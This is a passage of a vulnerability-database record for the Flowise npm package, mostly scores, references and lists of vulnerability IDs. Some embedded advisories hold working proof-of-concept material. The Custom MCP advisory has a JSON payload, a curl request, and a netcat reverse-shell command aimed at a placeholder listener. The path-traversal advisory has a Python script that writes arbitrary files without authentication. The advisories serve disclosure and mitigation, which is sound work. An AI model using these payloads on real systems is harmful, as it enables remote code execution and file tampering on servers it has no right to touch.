scoring_elements
2
value 8.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
3
value HIGH
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:39:44Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-w47f-j8rh-wx87
fixed_packages
0
url pkg:npm/flowise@3.1.0
purl pkg:npm/flowise@3.1.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-2891-vddv-ebff
1
vulnerability VCID-3chx-dj2u-kbab
2
vulnerability VCID-5j9e-bcr5-n7bs
3
vulnerability VCID-67mz-pfy4-ykep
4
vulnerability VCID-9rqv-p7rz-5kar
5
vulnerability VCID-cb6d-4c2v-w7c3
6
vulnerability VCID-cxja-9yxc-k7au
7
vulnerability VCID-gt6n-beak-33gy
8
vulnerability VCID-hdej-umwh-kqav
9
vulnerability VCID-kpyg-gve3-b3av
10
vulnerability VCID-qm89-q2ar-uyhy
11
vulnerability VCID-r74e-k86f-7qgb
12
vulnerability VCID-s3jg-wce1-fbf3
13
vulnerability VCID-xt1d-efw7-g3c6
14
vulnerability VCID-z1y2-f2ws-8ycb
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.1.0
aliases CVE-2026-41278, GHSA-w47f-j8rh-wx87
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-zwna-stj5-3yhm
55
url VCID-zwz7-byj4-6qan
vulnerability_id VCID-zwz7-byj4-6qan
summary Flowise vulnerable to XSS
references
0
reference_url https://github.com/advisories/GHSA-4fr9-3x69-36wv
reference_id GHSA-4fr9-3x69-36wv
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-4fr9-3x69-36wv
1
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-4fr9-3x69-36wv
reference_id GHSA-4fr9-3x69-36wv
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
1
value 6.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-4fr9-3x69-36wv
fixed_packages
0
url pkg:npm/flowise@3.0.8
purl pkg:npm/flowise@3.0.8
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14af-nhf3-aqba
1
vulnerability VCID-17k4-psgt-sydg
2
vulnerability VCID-19jc-umg6-v7ce
3
vulnerability VCID-1xfp-4rtg-4bcu
4
vulnerability VCID-2891-vddv-ebff
5
vulnerability VCID-3chx-dj2u-kbab
6
vulnerability VCID-3gp6-wwtd-kkf1
7
vulnerability VCID-488c-vrqu-f7hf
8
vulnerability VCID-5j9e-bcr5-n7bs
9
vulnerability VCID-5pup-kgaf-3ubw
10
vulnerability VCID-67mz-pfy4-ykep
11
vulnerability VCID-6ufs-d346-d7ev
12
vulnerability VCID-71uq-yx2j-cqak
13
vulnerability VCID-9bht-svq8-87b4
14
vulnerability VCID-9rqv-p7rz-5kar
15
vulnerability VCID-a1e4-f5dh-w3a5
16
vulnerability VCID-affy-v76q-fub6
17
vulnerability VCID-aqg8-6us7-uqef
18
vulnerability VCID-b97u-efzx-dffn
19
vulnerability VCID-bkmk-k9mn-ekhx
20
vulnerability VCID-cb6d-4c2v-w7c3
21
vulnerability VCID-cxja-9yxc-k7au
22
vulnerability VCID-d4wa-szeh-43ab
23
vulnerability VCID-dtss-epth-z7fh
24
vulnerability VCID-dzed-27rk-3qav
25
vulnerability VCID-e65e-s5sd-kuhp
26
vulnerability VCID-ejdc-j73x-jydk
27
vulnerability VCID-fu6t-9dk4-jbh9
28
vulnerability VCID-gt6n-beak-33gy
29
vulnerability VCID-gvpx-4wkw-43cz
30
vulnerability VCID-hdej-umwh-kqav
31
vulnerability VCID-hkfs-v3bp-kbh5
32
vulnerability VCID-j5hh-haj2-qydg
33
vulnerability VCID-jcze-eg2c-mkcf
34
vulnerability VCID-k579-xd81-hqdu
35
vulnerability VCID-kpyg-gve3-b3av
36
vulnerability VCID-ksmv-s6c9-t7ap
37
vulnerability VCID-m3j3-4u39-euht
38
vulnerability VCID-pzza-9xq9-a7de
39
vulnerability VCID-qm89-q2ar-uyhy
40
vulnerability VCID-r74e-k86f-7qgb
41
vulnerability VCID-rgmv-6bqh-eqf2
42
vulnerability VCID-s3jg-wce1-fbf3
43
vulnerability VCID-tdm1-91mc-8kgr
44
vulnerability VCID-v1nz-wwsu-qycg
45
vulnerability VCID-v9hg-7pex-g3dp
46
vulnerability VCID-w9yr-5jbp-q7fm
47
vulnerability VCID-xt1d-efw7-g3c6
48
vulnerability VCID-ywgu-76cy-uqe7
49
vulnerability VCID-z1y2-f2ws-8ycb
50
vulnerability VCID-zwna-stj5-3yhm
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.8
aliases GHSA-4fr9-3x69-36wv
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-zwz7-byj4-6qan
Fixing_vulnerabilities
0
url VCID-5hdy-fsnn-qfgq
vulnerability_id VCID-5hdy-fsnn-qfgq
summary Flowise through v3.0.4 is vulnerable to remote code execution via unsanitized evaluation of user input in the "Supabase RPC Filter" field.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-57164
reference_id
reference_type
scores
0
value 0.00211
scoring_system epss
scoring_elements 0.43694
published_at 2026-06-11T12:55:00Z
1
value 0.00211
scoring_system epss
scoring_elements 0.43862
published_at 2026-06-14T12:55:00Z
2
value 0.00211
scoring_system epss
scoring_elements 0.43872
published_at 2026-06-13T12:55:00Z
3
value 0.00211
scoring_system epss
scoring_elements 0.4385
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-57164
1
reference_url https://github.com/FlowiseAI/Flowise/blob/flowise%403.0.5/packages/components/nodes/vectorstores/Supabase/Supabase.ts#L237
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/blob/flowise%403.0.5/packages/components/nodes/vectorstores/Supabase/Supabase.ts#L237
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-57164
reference_id CVE-2025-57164
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-57164
3
reference_url https://github.com/FlowiseAI/Flowise
reference_id Flowise
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-10-17T19:30:36Z/
url https://github.com/FlowiseAI/Flowise
4
reference_url https://github.com/advisories/GHSA-7944-7c6r-55vv
reference_id GHSA-7944-7c6r-55vv
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-7944-7c6r-55vv
5
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-7944-7c6r-55vv
reference_id GHSA-7944-7c6r-55vv
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
2
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-10-17T19:30:36Z/
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-7944-7c6r-55vv
6
reference_url https://github.com/FlowiseAI/Flowise/blob/main/packages/components/nodes/vectorstores/Supabase/Supabase.ts#L237
reference_id Supabase.ts#L237
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-10-17T19:30:36Z/
url https://github.com/FlowiseAI/Flowise/blob/main/packages/components/nodes/vectorstores/Supabase/Supabase.ts#L237
fixed_packages
0
url pkg:npm/flowise@3.0.6
purl pkg:npm/flowise@3.0.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14af-nhf3-aqba
1
vulnerability VCID-17k4-psgt-sydg
2
vulnerability VCID-19jc-umg6-v7ce
3
vulnerability VCID-1xfp-4rtg-4bcu
4
vulnerability VCID-2891-vddv-ebff
5
vulnerability VCID-39aw-3gc6-bkgb
6
vulnerability VCID-3chx-dj2u-kbab
7
vulnerability VCID-3gp6-wwtd-kkf1
8
vulnerability VCID-488c-vrqu-f7hf
9
vulnerability VCID-5j9e-bcr5-n7bs
10
vulnerability VCID-5pup-kgaf-3ubw
11
vulnerability VCID-67mz-pfy4-ykep
12
vulnerability VCID-6ufs-d346-d7ev
13
vulnerability VCID-71uq-yx2j-cqak
14
vulnerability VCID-9bht-svq8-87b4
15
vulnerability VCID-9rqv-p7rz-5kar
16
vulnerability VCID-a1e4-f5dh-w3a5
17
vulnerability VCID-abyp-yn76-1yfp
18
vulnerability VCID-affy-v76q-fub6
19
vulnerability VCID-aqg8-6us7-uqef
20
vulnerability VCID-b97u-efzx-dffn
21
vulnerability VCID-bkmk-k9mn-ekhx
22
vulnerability VCID-cb6d-4c2v-w7c3
23
vulnerability VCID-cxja-9yxc-k7au
24
vulnerability VCID-d4wa-szeh-43ab
25
vulnerability VCID-dtss-epth-z7fh
26
vulnerability VCID-dzed-27rk-3qav
27
vulnerability VCID-e65e-s5sd-kuhp
28
vulnerability VCID-ejdc-j73x-jydk
29
vulnerability VCID-fu6t-9dk4-jbh9
30
vulnerability VCID-gt6n-beak-33gy
31
vulnerability VCID-gvpx-4wkw-43cz
32
vulnerability VCID-hdej-umwh-kqav
33
vulnerability VCID-hkfs-v3bp-kbh5
34
vulnerability VCID-j5hh-haj2-qydg
35
vulnerability VCID-jcze-eg2c-mkcf
36
vulnerability VCID-jmps-anck-eqdt
37
vulnerability VCID-k579-xd81-hqdu
38
vulnerability VCID-kpyg-gve3-b3av
39
vulnerability VCID-ksmv-s6c9-t7ap
40
vulnerability VCID-m3j3-4u39-euht
41
vulnerability VCID-pzza-9xq9-a7de
42
vulnerability VCID-qgs1-hazv-67b8
43
vulnerability VCID-qm89-q2ar-uyhy
44
vulnerability VCID-r74e-k86f-7qgb
45
vulnerability VCID-rgmv-6bqh-eqf2
46
vulnerability VCID-s3jg-wce1-fbf3
47
vulnerability VCID-tdm1-91mc-8kgr
48
vulnerability VCID-v1nz-wwsu-qycg
49
vulnerability VCID-v9hg-7pex-g3dp
50
vulnerability VCID-w9yr-5jbp-q7fm
51
vulnerability VCID-xt1d-efw7-g3c6
52
vulnerability VCID-ywgu-76cy-uqe7
53
vulnerability VCID-z1y2-f2ws-8ycb
54
vulnerability VCID-zwna-stj5-3yhm
55
vulnerability VCID-zwz7-byj4-6qan
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.6
aliases CVE-2025-57164, GHSA-7944-7c6r-55vv
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-5hdy-fsnn-qfgq
1
url VCID-8vsg-mxay-gkf7
vulnerability_id VCID-8vsg-mxay-gkf7
summary Duplicate Advisory: FlowiseAI Pre-Auth Arbitrary Code Execution
references
0
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-57164
reference_id CVE-2025-57164
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-57164
1
reference_url https://github.com/advisories/GHSA-3g4j-r53p-22wx
reference_id GHSA-3g4j-r53p-22wx
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-3g4j-r53p-22wx
2
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-7944-7c6r-55vv
reference_id GHSA-7944-7c6r-55vv
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-7944-7c6r-55vv
fixed_packages
0
url pkg:npm/flowise@3.0.6
purl pkg:npm/flowise@3.0.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14af-nhf3-aqba
1
vulnerability VCID-17k4-psgt-sydg
2
vulnerability VCID-19jc-umg6-v7ce
3
vulnerability VCID-1xfp-4rtg-4bcu
4
vulnerability VCID-2891-vddv-ebff
5
vulnerability VCID-39aw-3gc6-bkgb
6
vulnerability VCID-3chx-dj2u-kbab
7
vulnerability VCID-3gp6-wwtd-kkf1
8
vulnerability VCID-488c-vrqu-f7hf
9
vulnerability VCID-5j9e-bcr5-n7bs
10
vulnerability VCID-5pup-kgaf-3ubw
11
vulnerability VCID-67mz-pfy4-ykep
12
vulnerability VCID-6ufs-d346-d7ev
13
vulnerability VCID-71uq-yx2j-cqak
14
vulnerability VCID-9bht-svq8-87b4
15
vulnerability VCID-9rqv-p7rz-5kar
16
vulnerability VCID-a1e4-f5dh-w3a5
17
vulnerability VCID-abyp-yn76-1yfp
18
vulnerability VCID-affy-v76q-fub6
19
vulnerability VCID-aqg8-6us7-uqef
20
vulnerability VCID-b97u-efzx-dffn
21
vulnerability VCID-bkmk-k9mn-ekhx
22
vulnerability VCID-cb6d-4c2v-w7c3
23
vulnerability VCID-cxja-9yxc-k7au
24
vulnerability VCID-d4wa-szeh-43ab
25
vulnerability VCID-dtss-epth-z7fh
26
vulnerability VCID-dzed-27rk-3qav
27
vulnerability VCID-e65e-s5sd-kuhp
28
vulnerability VCID-ejdc-j73x-jydk
29
vulnerability VCID-fu6t-9dk4-jbh9
30
vulnerability VCID-gt6n-beak-33gy
31
vulnerability VCID-gvpx-4wkw-43cz
32
vulnerability VCID-hdej-umwh-kqav
33
vulnerability VCID-hkfs-v3bp-kbh5
34
vulnerability VCID-j5hh-haj2-qydg
35
vulnerability VCID-jcze-eg2c-mkcf
36
vulnerability VCID-jmps-anck-eqdt
37
vulnerability VCID-k579-xd81-hqdu
38
vulnerability VCID-kpyg-gve3-b3av
39
vulnerability VCID-ksmv-s6c9-t7ap
40
vulnerability VCID-m3j3-4u39-euht
41
vulnerability VCID-pzza-9xq9-a7de
42
vulnerability VCID-qgs1-hazv-67b8
43
vulnerability VCID-qm89-q2ar-uyhy
44
vulnerability VCID-r74e-k86f-7qgb
45
vulnerability VCID-rgmv-6bqh-eqf2
46
vulnerability VCID-s3jg-wce1-fbf3
47
vulnerability VCID-tdm1-91mc-8kgr
48
vulnerability VCID-v1nz-wwsu-qycg
49
vulnerability VCID-v9hg-7pex-g3dp
50
vulnerability VCID-w9yr-5jbp-q7fm
51
vulnerability VCID-xt1d-efw7-g3c6
52
vulnerability VCID-ywgu-76cy-uqe7
53
vulnerability VCID-z1y2-f2ws-8ycb
54
vulnerability VCID-zwna-stj5-3yhm
55
vulnerability VCID-zwz7-byj4-6qan
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.6
aliases GHSA-3g4j-r53p-22wx
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-8vsg-mxay-gkf7
2
url VCID-fje6-knjc-nfgf
vulnerability_id VCID-fje6-knjc-nfgf
summary 
Flowise has unsandboxed remote code execution via Custom MCP
### Summary
The Custom MCPs feature is designed to execute OS commands, for instance, using tools like `npx` to spin up local MCP Servers. However, Flowise's inherent authentication and authorization model is minimal and lacks role-based access controls (RBAC). Furthermore, the default installation of Flowise operates without authentication unless explicitly configured using the `FLOWISE_USERNAME` and `FLOWISE_PASSWORD` environment variables.

This combination presents a significant security risk, potentially allowing users on the platform to execute unsandboxed system commands. This can result in Remote Code Execution (RCE) and complete compromise of the running platform container or server.

### PoC
1. Follow the provided instructions for running the app using Docker Compose (or other methods of your choosing such as `npx`, `pnpm`, etc):
   https://github.com/FlowiseAI/Flowise?tab=readme-ov-file#-docker

2. Create a new file named `payload.json` somewhere in your machine, with the following data:
```
{"inputs":{"mcpServerConfig":{"command": "touch","args": ["/tmp/yofitofi"]}},"loadMethod":"listActions"}
```

3. Send the following `curl` request using the `payload.json` file created above with the following command:
```
curl -XPOST -H "x-request-from: internal" -H "Content-Type: application/json" --data @payload.json "http://localhost:3000/api/v1/node-load-method/customMCP"
```

4. Observe that a new file named `yofitofi` is created under `/tmp` folder.

Similarily, we can use the same technique to gain a reverse shell using the built-in `nc` utility with the following JSON payload:
```
{"inputs":{"mcpServerConfig":{"command": "nc","args": [
"<LISTENER_IP_ADDRESS>","<LISTENER_PORT>","-e","/bin/sh"
]}},
"loadMethod":"listActions"}
```

![Pasted image 20250420132335](https://github.com/user-attachments/assets/b41093b9-a0d7-415e-bf9b-b8cbce7183d6)

### Impact
Remote code execution

### Mitigation
- Consider adding additional access controls surronding sensitive functionality such as Custom MCP, e.g. only users with "Admin" roles will be able to configure new Custom MCPs within the platform.
- Consider disabling the Custom MCP feature by default, with a clear disclaimer for end users on the implications of enabling this feature.
- Consider running Custom MCPs within a sandboxed environment

### Credit
The vulnerability was discovered by Assaf Levkovich of the JFrog Security Research team.
references
0
reference_url https://github.com/FlowiseAI/Flowise/commit/ac7cf30e019cde54905bf09b5d3fe1c6ba42f9b9
reference_id
reference_type
scores
0
value 8.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/commit/ac7cf30e019cde54905bf09b5d3fe1c6ba42f9b9
1
reference_url https://github.com/FlowiseAI/Flowise/pull/5201
reference_id
reference_type
scores
0
value 8.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/pull/5201
2
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6933-jpx5-q87q
reference_id
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
1
value 8.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6933-jpx5-q87q
3
reference_url https://github.com/advisories/GHSA-6933-jpx5-q87q
reference_id GHSA-6933-jpx5-q87q
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-6933-jpx5-q87q
fixed_packages
0
url pkg:npm/flowise@3.0.6
purl pkg:npm/flowise@3.0.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14af-nhf3-aqba
1
vulnerability VCID-17k4-psgt-sydg
2
vulnerability VCID-19jc-umg6-v7ce
3
vulnerability VCID-1xfp-4rtg-4bcu
4
vulnerability VCID-2891-vddv-ebff
5
vulnerability VCID-39aw-3gc6-bkgb
6
vulnerability VCID-3chx-dj2u-kbab
7
vulnerability VCID-3gp6-wwtd-kkf1
8
vulnerability VCID-488c-vrqu-f7hf
9
vulnerability VCID-5j9e-bcr5-n7bs
10
vulnerability VCID-5pup-kgaf-3ubw
11
vulnerability VCID-67mz-pfy4-ykep
12
vulnerability VCID-6ufs-d346-d7ev
13
vulnerability VCID-71uq-yx2j-cqak
14
vulnerability VCID-9bht-svq8-87b4
15
vulnerability VCID-9rqv-p7rz-5kar
16
vulnerability VCID-a1e4-f5dh-w3a5
17
vulnerability VCID-abyp-yn76-1yfp
18
vulnerability VCID-affy-v76q-fub6
19
vulnerability VCID-aqg8-6us7-uqef
20
vulnerability VCID-b97u-efzx-dffn
21
vulnerability VCID-bkmk-k9mn-ekhx
22
vulnerability VCID-cb6d-4c2v-w7c3
23
vulnerability VCID-cxja-9yxc-k7au
24
vulnerability VCID-d4wa-szeh-43ab
25
vulnerability VCID-dtss-epth-z7fh
26
vulnerability VCID-dzed-27rk-3qav
27
vulnerability VCID-e65e-s5sd-kuhp
28
vulnerability VCID-ejdc-j73x-jydk
29
vulnerability VCID-fu6t-9dk4-jbh9
30
vulnerability VCID-gt6n-beak-33gy
31
vulnerability VCID-gvpx-4wkw-43cz
32
vulnerability VCID-hdej-umwh-kqav
33
vulnerability VCID-hkfs-v3bp-kbh5
34
vulnerability VCID-j5hh-haj2-qydg
35
vulnerability VCID-jcze-eg2c-mkcf
36
vulnerability VCID-jmps-anck-eqdt
37
vulnerability VCID-k579-xd81-hqdu
38
vulnerability VCID-kpyg-gve3-b3av
39
vulnerability VCID-ksmv-s6c9-t7ap
40
vulnerability VCID-m3j3-4u39-euht
41
vulnerability VCID-pzza-9xq9-a7de
42
vulnerability VCID-qgs1-hazv-67b8
43
vulnerability VCID-qm89-q2ar-uyhy
44
vulnerability VCID-r74e-k86f-7qgb
45
vulnerability VCID-rgmv-6bqh-eqf2
46
vulnerability VCID-s3jg-wce1-fbf3
47
vulnerability VCID-tdm1-91mc-8kgr
48
vulnerability VCID-v1nz-wwsu-qycg
49
vulnerability VCID-v9hg-7pex-g3dp
50
vulnerability VCID-w9yr-5jbp-q7fm
51
vulnerability VCID-xt1d-efw7-g3c6
52
vulnerability VCID-ywgu-76cy-uqe7
53
vulnerability VCID-z1y2-f2ws-8ycb
54
vulnerability VCID-zwna-stj5-3yhm
55
vulnerability VCID-zwz7-byj4-6qan
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.6
aliases GHSA-6933-jpx5-q87q
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-fje6-knjc-nfgf
3
url VCID-g7y6-euhd-jqhh
vulnerability_id VCID-g7y6-euhd-jqhh
summary 
Flowise has arbitrary file access due to missing chat flow id validation
### Summary

Missing chat flow id validation allows an attacker to access arbitrary file.

### Details

Commit https://github.com/FlowiseAI/Flowise/commit/8bd3de41533de78e4ef6c980e5704a1f9cb7ae6f and https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7 added check for `filename` when handling file upload operations to prevent path traversal, and additional validation of `chatflowId` and `chatId` from route `/api/v1/attachments`. In some cases, however,  `chatflowId` and `chatId` are not validated to ensure they are UUIDs or numbers, which may lead to security issues.

**Case 1**

When creating new chatflow via `/api/v1/chatflows`, function `addBase64FilesToStorage` is called if there exists base64 file data. Although the `filename` is sanitized, the `chatflowid` comes from request body directly without any validation. An attacker could exploit the path traversal here to write arbitrary file with controlled data.

```typescript
export const addBase64FilesToStorage = async (fileBase64: string, chatflowid: string, fileNames: string[]) => {
    // ...
    } else {
        const dir = path.join(getStoragePath(), chatflowid)  // path traversal here
        if (!fs.existsSync(dir)) {
            fs.mkdirSync(dir, { recursive: true })
        }

        const splitDataURI = fileBase64.split(',')
        const filename = splitDataURI.pop()?.split(':')[1] ?? ''
        const bf = Buffer.from(splitDataURI.pop() || '', 'base64')
        const sanitizedFilename = _sanitizeFilename(filename)

        const filePath = path.join(dir, sanitizedFilename)
        fs.writeFileSync(filePath, bf)
        fileNames.push(sanitizedFilename)
        return 'FILE-STORAGE::' + JSON.stringify(fileNames)
    }
}
```

**Case 2**

When downloading file via `/api/v1/openai-assistants-file/download` or `/api/v1/get-upload-file`, function `streamStorageFile` is called to retrieve file data from local or cloud bucket. The `chatflowId` and `chatId` are used for file path generation. Take Amazon S3 as an example, its [[documentation indicates](https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-keys.html#object-key-guidelines)](https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-keys.html#object-key-guidelines) that `../` will be treated as relative path.

Note that these APIs are in `WHITELIST_URLS`, an attacker may traverse user storage files without authentication.

### PoC

Launch app at localhost with default config, then run the following python script, a file named 'pwn' will be written to dir `/tmp` with content 'Hello, World!'.

```python
import requests
import json
url = "http://localhost:8080/api/v1/chatflows"
headers = {"x-request-from": "internal"}
nodedata = {
  "category" : "Document Loaders",
  "inputs" : {
    "key" : "data:text/plain;base64,SGVsbG8sIFdvcmxkIQ==,a:pwn"
  }
}
flownode = {
  "id" : "a",
  "data" : nodedata
}
flowdata = {
  "nodes" : [flownode],
  "edges" : [],
  "viewport" : {
    "x" : 1,
    "y" : 1,
    "zoom" : 1
  }
}
data = {
  "id" : "../../../../../tmp",
  "name" : "name",
  "flowData" : json.dumps(flowdata)
}
res = requests.post(url, json=data, headers=headers)
```

### Impact

1. Arbitrary file read / write
2. Remote Code Execution
3. Data loss
references
0
reference_url https://github.com/FlowiseAI/Flowise/commit/8bd3de41533de78e4ef6c980e5704a1f9cb7ae6f
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/commit/8bd3de41533de78e4ef6c980e5704a1f9cb7ae6f
1
reference_url https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7
2
reference_url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-q67q-549q-p849
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
2
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-q67q-549q-p849
3
reference_url https://github.com/advisories/GHSA-q67q-549q-p849
reference_id GHSA-q67q-549q-p849
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-q67q-549q-p849
fixed_packages
0
url pkg:npm/flowise@3.0.6
purl pkg:npm/flowise@3.0.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14af-nhf3-aqba
1
vulnerability VCID-17k4-psgt-sydg
2
vulnerability VCID-19jc-umg6-v7ce
3
vulnerability VCID-1xfp-4rtg-4bcu
4
vulnerability VCID-2891-vddv-ebff
5
vulnerability VCID-39aw-3gc6-bkgb
6
vulnerability VCID-3chx-dj2u-kbab
7
vulnerability VCID-3gp6-wwtd-kkf1
8
vulnerability VCID-488c-vrqu-f7hf
9
vulnerability VCID-5j9e-bcr5-n7bs
10
vulnerability VCID-5pup-kgaf-3ubw
11
vulnerability VCID-67mz-pfy4-ykep
12
vulnerability VCID-6ufs-d346-d7ev
13
vulnerability VCID-71uq-yx2j-cqak
14
vulnerability VCID-9bht-svq8-87b4
15
vulnerability VCID-9rqv-p7rz-5kar
16
vulnerability VCID-a1e4-f5dh-w3a5
17
vulnerability VCID-abyp-yn76-1yfp
18
vulnerability VCID-affy-v76q-fub6
19
vulnerability VCID-aqg8-6us7-uqef
20
vulnerability VCID-b97u-efzx-dffn
21
vulnerability VCID-bkmk-k9mn-ekhx
22
vulnerability VCID-cb6d-4c2v-w7c3
23
vulnerability VCID-cxja-9yxc-k7au
24
vulnerability VCID-d4wa-szeh-43ab
25
vulnerability VCID-dtss-epth-z7fh
26
vulnerability VCID-dzed-27rk-3qav
27
vulnerability VCID-e65e-s5sd-kuhp
28
vulnerability VCID-ejdc-j73x-jydk
29
vulnerability VCID-fu6t-9dk4-jbh9
30
vulnerability VCID-gt6n-beak-33gy
31
vulnerability VCID-gvpx-4wkw-43cz
32
vulnerability VCID-hdej-umwh-kqav
33
